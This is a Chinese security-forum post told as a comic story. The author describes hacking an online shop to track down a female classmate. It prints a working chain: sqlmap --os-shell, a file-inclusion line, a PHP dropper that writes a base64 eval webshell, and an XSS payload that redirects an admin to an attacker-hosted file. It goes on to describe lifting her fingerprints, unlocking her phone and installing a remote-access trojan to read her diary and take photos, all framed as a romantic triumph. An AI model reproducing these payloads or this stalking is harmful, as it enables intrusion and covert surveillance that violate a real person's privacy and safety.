本文来自i春秋作者：gh0stkey

-=--=--=--=--=--=--=--=--=--=--=--=-
时间：早上8点02分(洛杉矶时间)
作者：gh0stkey(米斯特安全团队核心)
-=--=--=--=--=--=--=--=--=--=--=--=-

文章前介：

主角：gh0stkey本人(化名:key)、国外留学学生(妹子)

导火线：带有印子的纸条

文章导读：

一张神秘的纸条出现在主角的生活之中，却让主角颠覆了"屌丝"的身份。

纸条模样还原： 因为当时没想到要拍照，就借下网图。

内容简介：

事情是这样的，在一个阳光明媚的早晨，Key开始了老套的生活方式(洗脸刷牙..)上学去了。 ...中间省略上课不听讲的趣事。 只听"叮铃铃"的下课铃，Key跟往常一样走出教室呼吸下新鲜的空气，可是意外的在走廊上发现了一张纸条。

上面的内容大概是一串数字：1001...(大概就是10这两个数字重复的使用) Key饶有兴趣的看了下，飞快的在大脑中找出了两种解决思路：二进制 摩斯电码。

Key再进行思考，发现只有摩斯电码可行(这样与之匹配 1=滴 0=嗒 正好学校最近也教过摩斯电码) 这样再进行一次转换(滴=· 嗒=-) 然后对应图1进行解码，发现结果居然是个中国的手机号。 出于好奇，Key使用了一个手机号位置定位的系统进行了查询：

（位置仅供参考而已。）

Key就在想自己班里是不是有一个就是新疆过来的？(其实就是在YY，是男的还是女的)

二话不说就动手把上次备份下来的同学信息档案调出来：

看到一个叫韩雨的，名字一看，果不其然是个妹子！(到这里Key的"屌丝"气质就显露无疑了)

开始进行人肉搜索，这里Key选择了Google进行搜索，先是搜索了"YuHan"的关键词，其实没有多少用处(名字太多找不到有用信息)

再进行手机号的搜索发现了一个网站:

居然搜索到了这个，进去了网站瞬间给跳转到了主页index.html

有经验的人就知道这个页面能被爬到，说明之前存在越权漏洞。

但是到Key开始玩的时候就给修复了，Key顿时脸上就多了几条黑线。。。

这彻底激发了Key的屌丝之魂，利用了Safe3进行了SQL注入的扫描 结果:

http://****/index.php?shop=17 可能存在SQL注入漏洞

虽然是爆出了可能存在其实使用SQLMAP注入也是可以的： 直接使用正常的语法就注入出来了：

Key看到数据量也是很大的，但并没有去Dump数据而是选择了温柔的方式：--os-shell

可惜的是并没有权限去执行，无奈，只得继续挖掘其他的漏洞。

通过一系列的测试挖到了一个XSS反射(这里的挖掘思路无非就是见参数就使用payload插进去然后看返回的信息进行构造)：

不过光一个XSS反射没有什么用，于是Key选择了代码审计这款程序，因为是一款开源的商城程序，很快就可以找到。

Key直接使用Tommsearch快速搜索找到后台一处代码：

<?php
include($_GET['action']);
....

明眼人直接可以看出来，存在文件包含漏洞。 但是只是后台，该怎么办？于是Key就结合了XSS反射漏洞进行：

Key在自己的主机上创建了个文件:1.php内容为：

<?php file_put_contents('key.php',base64_decode('QGV2YWwoJF9QT1NUJiM5MTtrZXkmIzkzOyk7Pz4=')); ?>

然后构建了xss反射的payload：

<script>href.location="/admin/ad.php?action=http://****.top/1.php"</script>

直接跳转到文件包含那个URL中然后包含Key的1.php文件这样就可以创建key.php木马文件了(一句话木马 也就是1.php的代码意思)。

流程图：

这边利用的商品评价，诱惑下后台的人。

OK这次渗透就到这里，Key顺利的拿下了Webshell：

之后Key得到了妹纸的买卖信息，其中步伐有胸罩购买！！(Key这时鼻血已经流出来了啦)

OK获取这些之后，Key整理了下文本就关机睡觉等待第二天去撩那个妹子(韩雨)。

。。。

第二天来到的如此之快，再去学校的路上Key碰见了上学以来对自己很照顾的同桌，并且知道了韩雨的模样(喷血喷血，好漂酿的)

走进了班级，Key东张西望，只见"清爽的头发，清秀的脸皮，清澈的眼眸"，没错就是韩雨！

Key以不是很流利的英语跟韩雨打招呼，得来的却是：“我知道你是中国人，我们可以用中国话沟通的。”

只听“啪啪啪啪”的响声，Key被打脸了，很疼

。。。 经过跟妹子的交流，他们的关系似乎在慢慢的拉近，于是相约去吃牛排(这期间细节就不多讲，就是撩妹子)，由于有事情，妹子先走了。 Key作为一名职业的“屌丝”！随身携带胶带纸是很有必要的，于是利用胶带纸小心翼翼的采集了西餐刀上的指纹：

顺利的保留下来之后，下面的才是有趣的。 。。。 又是过了几天，Key由于迟到被留下来罚打扫教室，发现韩雨的抽屉手机没带回去。Key试着打开手机可是有密码，也不知道，懒得用知道的信息做成密码攻击字典了，于是就用之前收集好的指纹信息顺利的解锁了手机，并且打开自己的网盘，种下了以前玩的安卓远控，安然无恙的放回了抽屉中。

。。。 终于，利用木马，Key有了妹子的正脸照：

Key也偷看了她的日记：

9.12号，今天有点累，闺蜜们都有男朋友安慰，突然觉得有男朋友真好。

这条日记 Key仿佛看到了希望！！

于是Key直接干脆的来了条：
第二天，Key直接当众表白(这里当然不能少了玫瑰花)，结果是成功了！

就这样Key成功的逆袭了“屌丝”的身份。

原文地址：http://bbs.ichunqiu.com/thread-12136-1-1.html?from=paper

---